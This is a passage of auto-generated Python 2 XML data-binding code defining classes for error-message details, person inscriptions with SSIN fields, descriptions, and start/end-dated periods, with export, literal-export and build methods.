def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='DetailMessageType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='DetailMessageType', fromsubclass_=False):
if self.Severity is not None:
showIndent(outfile, level)
outfile.write('<%sSeverity>%s</%sSeverity>\n' %
(namespace_, self.gds_format_string(quote_xml(self.Severity).encode(ExternalEncoding), input_name='Severity'), namespace_))
if self.ReasonCode is not None:
showIndent(outfile, level)
outfile.write('<%sReasonCode>%s</%sReasonCode>\n' %
(namespace_, self.gds_format_string(quote_xml(self.ReasonCode).encode(ExternalEncoding), input_name='ReasonCode'), namespace_))
if self.Diagnostic is not None:
showIndent(outfile, level)
outfile.write('<%sDiagnostic>%s</%sDiagnostic>\n' %
(namespace_, self.gds_format_string(quote_xml(self.Diagnostic).encode(ExternalEncoding), input_name='Diagnostic'), namespace_))
if self.AuthorCodeList is not None:
showIndent(outfile, level)
outfile.write('<%sAuthorCodeList>%s</%sAuthorCodeList>\n' %
(namespace_, self.gds_format_string(quote_xml(self.AuthorCodeList).encode(ExternalEncoding), input_name='AuthorCodeList'), namespace_))
for Information_ in self.Information:
Information_.export(
outfile, level, namespace_, name_='Information')
def hasContent_(self):
if (
self.Severity is not None or
self.ReasonCode is not None or
self.Diagnostic is not None or
self.AuthorCodeList is not None or
self.Information
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='DetailMessageType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Severity is not None:
showIndent(outfile, level)
outfile.write('Severity=%s,\n' %
quote_python(self.Severity).encode(ExternalEncoding))
if self.ReasonCode is not None:
showIndent(outfile, level)
outfile.write('ReasonCode=%s,\n' %
quote_python(self.ReasonCode).encode(ExternalEncoding))
if self.Diagnostic is not None:
showIndent(outfile, level)
outfile.write('Diagnostic=%s,\n' %
quote_python(self.Diagnostic).encode(ExternalEncoding))
if self.AuthorCodeList is not None:
showIndent(outfile, level)
outfile.write('AuthorCodeList=%s,\n' %
quote_python(self.AuthorCodeList).encode(ExternalEncoding))
showIndent(outfile, level)
outfile.write('Information=[\n')
level += 1
for Information_ in self.Information:
showIndent(outfile, level)
outfile.write('model_.InformationType(\n')
Information_.exportLiteral(outfile, level, name_='InformationType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Severity':
Severity_ = child_.text
Severity_ = self.gds_validate_string(Severity_, node, 'Severity')
self.Severity = Severity_
# validate type SeverityType
self.validate_SeverityType(self.Severity)
elif nodeName_ == 'ReasonCode':
ReasonCode_ = child_.text
ReasonCode_ = self.gds_validate_string(
ReasonCode_, node, 'ReasonCode')
self.ReasonCode = ReasonCode_
elif nodeName_ == 'Diagnostic':
Diagnostic_ = child_.text
Diagnostic_ = self.gds_validate_string(
Diagnostic_, node, 'Diagnostic')
self.Diagnostic = Diagnostic_
elif nodeName_ == 'AuthorCodeList':
AuthorCodeList_ = child_.text
AuthorCodeList_ = self.gds_validate_string(
AuthorCodeList_, node, 'AuthorCodeList')
self.AuthorCodeList = AuthorCodeList_
elif nodeName_ == 'Information':
obj_ = InformationType.factory()
obj_.build(child_)
self.Information.append(obj_)
# end class DetailMessageType
class ReasonCode(GeneratedsSuper):
"""error code"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if ReasonCode.subclass:
return ReasonCode.subclass(*args_, **kwargs_)
else:
return ReasonCode(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='ReasonCode', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='ReasonCode')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ReasonCode'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='ReasonCode', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='ReasonCode'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class ReasonCode
class Diagnostic(GeneratedsSuper):
"""textual error message"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if Diagnostic.subclass:
return Diagnostic.subclass(*args_, **kwargs_)
else:
return Diagnostic(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='Diagnostic', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='Diagnostic')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='Diagnostic'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='Diagnostic', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='Diagnostic'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class Diagnostic
class AuthorCodeList(GeneratedsSuper):
"""organisation responsible for the reason code"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if AuthorCodeList.subclass:
return AuthorCodeList.subclass(*args_, **kwargs_)
else:
return AuthorCodeList(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='AuthorCodeList', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='AuthorCodeList')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AuthorCodeList'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='AuthorCodeList', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='AuthorCodeList'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class AuthorCodeList
class InscriptionType(GeneratedsSuper):
"""An inscription"""
subclass = None
superclass = None
def __init__(self, SSIN=None, OrgUnit=None, Purpose=None, Period=None, InscriptionCode=None, PhaseCode=None):
self.SSIN = SSIN
self.OrgUnit = OrgUnit
self.Purpose = Purpose
self.Period = Period
self.InscriptionCode = InscriptionCode
self.PhaseCode = PhaseCode
def factory(*args_, **kwargs_):
if InscriptionType.subclass:
return InscriptionType.subclass(*args_, **kwargs_)
else:
return InscriptionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_SSIN(self):
return self.SSIN
def set_SSIN(self, SSIN):
self.SSIN = SSIN
def validate_t_SSIN(self, value):
# Validate type t_SSIN, a restriction on xs:string.
pass
def get_OrgUnit(self):
return self.OrgUnit
def set_OrgUnit(self, OrgUnit):
self.OrgUnit = OrgUnit
def get_Purpose(self):
return self.Purpose
def set_Purpose(self, Purpose):
self.Purpose = Purpose
def get_Period(self):
return self.Period
def set_Period(self, Period):
self.Period = Period
def get_InscriptionCode(self):
return self.InscriptionCode
def set_InscriptionCode(self, InscriptionCode):
self.InscriptionCode = InscriptionCode
def get_PhaseCode(self):
return self.PhaseCode
def set_PhaseCode(self, PhaseCode):
self.PhaseCode = PhaseCode
def export(self, outfile, level, namespace_='', name_='InscriptionType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='InscriptionType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='InscriptionType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='InscriptionType', fromsubclass_=False):
if self.SSIN is not None:
showIndent(outfile, level)
outfile.write('<%sSSIN>%s</%sSSIN>\n' %
(namespace_, self.gds_format_string(quote_xml(self.SSIN).encode(ExternalEncoding), input_name='SSIN'), namespace_))
if self.OrgUnit is not None:
showIndent(outfile, level)
outfile.write('<%sOrgUnit>%s</%sOrgUnit>\n' %
(namespace_, self.gds_format_string(quote_xml(self.OrgUnit).encode(ExternalEncoding), input_name='OrgUnit'), namespace_))
if self.Purpose is not None:
showIndent(outfile, level)
outfile.write('<%sPurpose>%s</%sPurpose>\n' %
(namespace_, self.gds_format_integer(self.Purpose, input_name='Purpose'), namespace_))
if self.Period:
self.Period.export(outfile, level, namespace_, name_='Period')
if self.InscriptionCode is not None:
showIndent(outfile, level)
outfile.write('<%sInscriptionCode>%s</%sInscriptionCode>\n' %
(namespace_, self.gds_format_integer(self.InscriptionCode, input_name='InscriptionCode'), namespace_))
if self.PhaseCode is not None:
showIndent(outfile, level)
outfile.write('<%sPhaseCode>%s</%sPhaseCode>\n' %
(namespace_, self.gds_format_integer(self.PhaseCode, input_name='PhaseCode'), namespace_))
def hasContent_(self):
if (
self.SSIN is not None or
self.OrgUnit is not None or
self.Purpose is not None or
self.Period is not None or
self.InscriptionCode is not None or
self.PhaseCode is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='InscriptionType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.SSIN is not None:
showIndent(outfile, level)
outfile.write('SSIN=%s,\n' %
quote_python(self.SSIN).encode(ExternalEncoding))
if self.OrgUnit is not None:
showIndent(outfile, level)
outfile.write('OrgUnit=%s,\n' %
quote_python(self.OrgUnit).encode(ExternalEncoding))
if self.Purpose is not None:
showIndent(outfile, level)
outfile.write('Purpose=%d,\n' % self.Purpose)
if self.Period is not None:
showIndent(outfile, level)
outfile.write('Period=model_.PeriodType(\n')
self.Period.exportLiteral(outfile, level, name_='Period')
showIndent(outfile, level)
outfile.write('),\n')
if self.InscriptionCode is not None:
showIndent(outfile, level)
outfile.write('InscriptionCode=%d,\n' % self.InscriptionCode)
if self.PhaseCode is not None:
showIndent(outfile, level)
outfile.write('PhaseCode=%d,\n' % self.PhaseCode)
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SSIN':
SSIN_ = child_.text
SSIN_ = self.gds_validate_string(SSIN_, node, 'SSIN')
self.SSIN = SSIN_
self.validate_t_SSIN(self.SSIN) # validate type t_SSIN
elif nodeName_ == 'OrgUnit':
OrgUnit_ = child_.text
OrgUnit_ = self.gds_validate_string(OrgUnit_, node, 'OrgUnit')
self.OrgUnit = OrgUnit_
elif nodeName_ == 'Purpose':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'Purpose')
self.Purpose = ival_
elif nodeName_ == 'Period':
obj_ = PeriodType.factory()
obj_.build(child_)
self.set_Period(obj_)
elif nodeName_ == 'InscriptionCode':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscriptionCode')
self.InscriptionCode = ival_
elif nodeName_ == 'PhaseCode':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'PhaseCode')
self.PhaseCode = ival_
# end class InscriptionType
class DescriptionType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, lang=None, valueOf_=None):
self.lang = _cast(None, lang)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if DescriptionType.subclass:
return DescriptionType.subclass(*args_, **kwargs_)
else:
return DescriptionType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_lang(self):
return self.lang
def set_lang(self, lang):
self.lang = lang
def validate_t_Language(self, value):
# Validate type t_Language, a restriction on xs:string.
pass
def get_valueOf_(self):
return self.valueOf_
def set_valueOf_(self, valueOf_):
self.valueOf_ = valueOf_
def export(self, outfile, level, namespace_='', name_='DescriptionType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='DescriptionType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='DescriptionType'):
if self.lang is not None and 'lang' not in already_processed:
already_processed.append('lang')
outfile.write(' lang=%s' % (quote_attrib(self.lang), ))
def exportChildren(self, outfile, level, namespace_='', name_='DescriptionType', fromsubclass_=False):
pass
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='DescriptionType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
showIndent(outfile, level)
outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.lang is not None and 'lang' not in already_processed:
already_processed.append('lang')
showIndent(outfile, level)
outfile.write('lang = "%s",\n' % (self.lang,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('lang', node)
if value is not None and 'lang' not in already_processed:
already_processed.append('lang')
self.lang = value
self.validate_t_Language(self.lang) # validate type t_Language
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class DescriptionType
class PeriodType(GeneratedsSuper):
"""A period of time between a startdate and an enddate"""
subclass = None
superclass = None
def __init__(self, StartDate=None, EndDate=None):
self.StartDate = StartDate
self.EndDate = EndDate
def factory(*args_, **kwargs_):
if PeriodType.subclass:
return PeriodType.subclass(*args_, **kwargs_)
else:
return PeriodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_StartDate(self):
return self.StartDate
def set_StartDate(self, StartDate):
self.StartDate = StartDate
def get_EndDate(self):
return self.EndDate
def set_EndDate(self, EndDate):
self.EndDate = EndDate
def export(self, outfile, level, namespace_='', name_='PeriodType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='PeriodType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='PeriodType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='PeriodType', fromsubclass_=False):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('<%sStartDate>%s</%sStartDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.StartDate).encode(ExternalEncoding), input_name='StartDate'), namespace_))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('<%sEndDate>%s</%sEndDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.EndDate).encode(ExternalEncoding), input_name='EndDate'), namespace_))
def hasContent_(self):
if (
self.StartDate is not None or
self.EndDate is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='PeriodType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('StartDate=%s,\n' %
quote_python(self.StartDate).encode(ExternalEncoding))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('EndDate=%s,\n' %
quote_python(self.EndDate).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'StartDate':
StartDate_ = child_.text
StartDate_ = self.gds_validate_string(
StartDate_, node, 'StartDate')
self.StartDate = StartDate_
elif nodeName_ == 'EndDate':
EndDate_ = child_.text
EndDate_ = self.gds_validate_string(EndDate_, node, 'EndDate')
self.EndDate = EndDate_
# end class PeriodType
class StartDate(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if StartDate.subclass:
return StartDate.subclass(*args_, **kwargs_)
else:
return StartDate(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='StartDate', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='StartDate')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='StartDate'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='StartDate', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='StartDate'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class StartDate
class EndDate(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if EndDate.subclass:
return EndDate.subclass(*args_, **kwargs_)
else:
return EndDate(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='EndDate', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(
outfile, level, already_processed, namespace_, name_='EndDate')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='EndDate'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='EndDate', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='EndDate'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class EndDate
class ClosedPeriodType(GeneratedsSuper):
"""A closed period with a mandatory start and end date"""
subclass = None
superclass = None
def __init__(self, StartDate=None, EndDate=None):
self.StartDate = StartDate
self.EndDate = EndDate
def factory(*args_, **kwargs_):
if ClosedPeriodType.subclass:
return ClosedPeriodType.subclass(*args_, **kwargs_)
else:
return ClosedPeriodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_StartDate(self):
return self.StartDate
def set_StartDate(self, StartDate):
self.StartDate = StartDate
def get_EndDate(self):
return self.EndDate
def set_EndDate(self, EndDate):
self.EndDate = EndDate
def export(self, outfile, level, namespace_='', name_='ClosedPeriodType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='ClosedPeriodType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='ClosedPeriodType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='ClosedPeriodType', fromsubclass_=False):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('<%sStartDate>%s</%sStartDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.StartDate).encode(ExternalEncoding), input_name='StartDate'), namespace_))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('<%sEndDate>%s</%sEndDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.EndDate).encode(ExternalEncoding), input_name='EndDate'), namespace_))
def hasContent_(self):
if (
self.StartDate is not None or
self.EndDate is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='ClosedPeriodType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('StartDate=%s,\n' %
quote_python(self.StartDate).encode(ExternalEncoding))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('EndDate=%s,\n' %
quote_python(self.EndDate).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'StartDate':
StartDate_ = child_.text
StartDate_ = self.gds_validate_string(
StartDate_, node, 'StartDate')
self.StartDate = StartDate_
elif nodeName_ == 'EndDate':
EndDate_ = child_.text
EndDate_ = self.gds_validate_string(EndDate_, node, 'EndDate')
self.EndDate = EndDate_
# end class ClosedPeriodType
class StartingPeriodType(GeneratedsSuper):
"""A halfopen period with a mandatory start date"""
subclass = None
superclass = None
def __init__(self, StartDate=None, EndDate=None):
self.StartDate = StartDate
self.EndDate = EndDate
def factory(*args_, **kwargs_):
if StartingPeriodType.subclass:
return StartingPeriodType.subclass(*args_, **kwargs_)
else:
return StartingPeriodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_StartDate(self):
return self.StartDate
def set_StartDate(self, StartDate):
self.StartDate = StartDate
def get_EndDate(self):
return self.EndDate
def set_EndDate(self, EndDate):
self.EndDate = EndDate
def export(self, outfile, level, namespace_='', name_='StartingPeriodType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='StartingPeriodType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='StartingPeriodType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='StartingPeriodType', fromsubclass_=False):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('<%sStartDate>%s</%sStartDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.StartDate).encode(ExternalEncoding), input_name='StartDate'), namespace_))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('<%sEndDate>%s</%sEndDate>\n' %
(namespace_, self.gds_format_string(quote_xml(self.EndDate).encode(ExternalEncoding), input_name='EndDate'), namespace_))
def hasContent_(self):
if (
self.StartDate is not None or
self.EndDate is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='StartingPeriodType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('StartDate=%s,\n' %
quote_python(self.StartDate).encode(ExternalEncoding))
if self.EndDate is not None:
showIndent(outfile, level)
outfile.write('EndDate=%s,\n' %
quote_python(self.EndDate).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'StartDate':
StartDate_ = child_.text
StartDate_ = self.gds_validate_string(
StartDate_, node, 'StartDate')
self.StartDate = StartDate_
elif nodeName_ == 'EndDate':
EndDate_ = child_.text
EndDate_ = self.gds_validate_string(EndDate_, node, 'EndDate')
self.EndDate = EndDate_
# end class StartingPeriodType
class EndingPeriodType(GeneratedsSuper):
"""A halfopen period with a mandatory end date"""
subclass = None
superclass = None
def __init__(self, StartDate=None, EndDate=None):
self.StartDate = StartDate
self.EndDate = EndDate
def factory(*args_, **kwargs_):
if EndingPeriodType.subclass:
return EndingPeriodType.subclass(*args_, **kwargs_)
else:
return EndingPeriodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_StartDate(self):
return self.StartDate
def set_StartDate(self, StartDate):
self.StartDate = StartDate
def get_EndDate(self):
return self.EndDate
def set_EndDate(self, EndDate):
self.EndDate = EndDate
def export(self, outfile, level, namespace_='', name_='EndingPeriodType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' %
(namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed,
namespace_, name_='EndingPeriodType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='EndingPeriodType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='EndingPeriodType', fromsubclass_=False):
if self.StartDate is not None:
showIndent(outfile, level)
outfile.write('<%sStartDate>%s</%sStartDate>\n' %
